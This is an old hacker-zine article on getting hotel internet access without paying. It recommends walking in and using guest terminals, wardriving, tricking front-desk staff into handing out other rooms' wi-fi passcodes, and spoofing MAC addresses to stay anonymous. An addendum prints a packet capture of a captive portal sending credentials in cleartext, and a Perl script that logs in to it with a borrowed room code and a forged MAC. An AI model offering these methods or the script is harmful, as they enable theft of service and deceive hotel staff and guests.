// Hotels: Your Inn for Access // // by dual // // http://www.oldskoolphreak.com Introduction ------------ I just read Hacking the Hilton by Estragon in 21:1 - a good read. I've also posted on the binrev forums about the free internet access to be had at hotels. As Estragon's article focuses on one system (in Europe) and a post on a board is hardly an article, I thought I'd discuss a few practical methods of gaining access and keeping anonymous if you're actually staying for an evening. Gaining Access -------------- The Swipe - This is where you actually stay at the hotel and have to bust out the plastic. I wouldn't live anywhere that didn't have broadband, why the hell would I stay at a hotel that didn't? The Walk-in - This is the least technical method, but the most daring. Most hotels in the U.S. offer some kind of free internet access for their patrons. More often than not, it comes in the form of a box in or near the lobby hooked up to some type of broadband connection. Simply walk into the hotel like you own the place, sit down at the terminal and enjoy your access. Dressing nice helps, and I've never run into a box that has needed authentication. This method is daring in that you may have to use your SE skills if questioned. Just another opportunity to hone. The Drive-by - Hotels are usually built in groups around airports, industrial areas and busy highway off-ramps. Wardriving around these congregations will net some WAPs, and if you're fortunate, a forward-looking hotel will give customers free wireless access. You may run into a hotel that offers free wi-fi, but requires some sort of authentication. Golden Tree wireless at Fairfield Inn comes to mind. They require a room number and a five digit passcode to use the wireless access. You guessed it, use your social engineering skills again. Walk right up to the front desk, give a (realistic) room number, and ask for "your" passcode. After you get it, head into the hotel and out another exit. There are too many questions that could be asked or exchanges that could be made to go over here. I leave them to your quick wit. The Hook-up - Similar to the Walk-in, here you take advantage of the "business centers" that hotels provide patrons. Unfortunately, these psuedo-offices are wired and cost money. It may be more difficult to SE access here, and definitely more costly if you're caught. Not recommended. Staying Anonymous ----------------- Let's say you dropped the coin and are planning to snooze in your non- smoking double-queen. You've got free wi-fi, like Golden Tree. What's the first thing you do when using any wireless access? Exactly. Spoof your MAC. Good. Now don't call down to the front desk for your code. They know where you're calling from. Head down there to ask for your code. You're in 201, ask for 118. If you're really lucky, they'll plop down the binder with all of codes. Memorize a few and associate them with a few MACs. (If you're in your car enjoying access, just spoof your MAC and be smart.) Please don't check your POP mail or FTP anything using wi-fi, as bland may be staying at the very same hotel. Seriously, use some type of encryption when you travel. I prefer to set up a box at home that I can ssh into, and then use pine, epic, centericq, links, etc. Conclusion ---------- Broadband is cheap and abundant in the U.S. You probably don't have to be a sneakypants to get access, but it's nice to know that if comes down to infiltrating the Holiday Inn Express to read Slashdot, you can. Addendum -------- Golden Tree Wi-Fi user and pass are passed in the clear: -------------------------------------------------------------------------- 0000 00 02 6b 01 e2 60 00 02 2d 40 80 c7 08 00 45 00 ..k..`.. -@....E. 0010 01 0b 00 7d 40 00 80 06 3a 57 ac 14 65 ef ac 14 ...}@... :W..e... 0020 01 01 04 0e 26 94 e1 e4 56 97 7c 0f ff eb 50 18 ....&... V.|...P. 0030 44 70 f2 16 00 00 43 6f 6e 74 65 6e 74 2d 54 79 Dp....Co ntent-Ty 0040 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f pe: appl ication/ 0050 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e x-www-fo rm-urlen 0060 63 6f 64 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c coded..C ontent-L 0070 65 6e 67 74 68 3a 20 31 35 35 0d 0a 0d 0a 75 73 ength: 1 55....us 0080 65 70 6f 6c 69 63 79 3d 6f 6e 26 6e 61 6d 65 3d epolicy= on&name= 0090 33 30 31 26 70 77 64 3d 32 30 37 35 38 26 69 70 666&pwd= 12345&ip 00a0 3d 31 37 32 2e 32 30 2e 31 30 31 2e 32 33 39 26 =172.20. 101.239& 00b0 6d 61 63 3d 30 30 25 33 41 30 32 25 33 41 32 44 mac=00%3 A02%3A2D 00c0 25 33 41 34 30 25 33 41 38 30 25 33 41 43 37 26 %3A40%3A 80%3AC7& 00d0 66 65 65 3d 30 2e 30 30 26 72 74 79 70 65 3d 30 fee=0.00 &rtype=0 00e0 26 70 72 69 6e 74 65 72 3d 30 26 70 66 65 65 3d &printer =0&pfee= 00f0 30 26 67 61 72 64 65 6e 3d 30 26 72 70 61 67 65 0&garden =0&rpage 0100 3d 77 77 77 2e 6d 61 72 72 69 6f 74 74 2e 63 6f =www.mar riott.co 0110 6d 25 32 46 47 54 46 46 49 m%2FGTFF I -------------------------------------------------------------------------- Knowing this and the HTML from the authentication page, one can easily authenticate with a little Perl. Of note, the MAC address in the script will override the MAC of your NIC, i.e. you can associate a user/pass pair with a MAC different from your physical MAC. -------------------------------------------------------------------------- #!/usr/bin/perl -w use LWP::UserAgent; $browser = LWP::UserAgent->new; push @{$browser->requests_redirectable}, 'POST'; $response = $browser->post( 'http://172.20.1.1:9876/go_passwd.php', [ 'usepolicy' => 'on', 'name' => '666', 'pwd' => '12345', 'ip' => '172.20.100.140', 'mac' => '00:DE:AD:BE:EF:00', 'fee' => '0.00', 'rtype' => '0', 'printer' => '0', 'pfee' => '0', 'garden' => '0', 'rpage' => 'www.marriott.com/MOTFI' ], ); die "Error: ", $response->status_line, "\n" unless $response->is_success; open(OUT, ">gtwifi.txt") or die "Can't open file: $!"; binmode(OUT); print OUT $response->content; close(OUT); print "Submitted successfully.\n"; --------------------------------------------------------------------------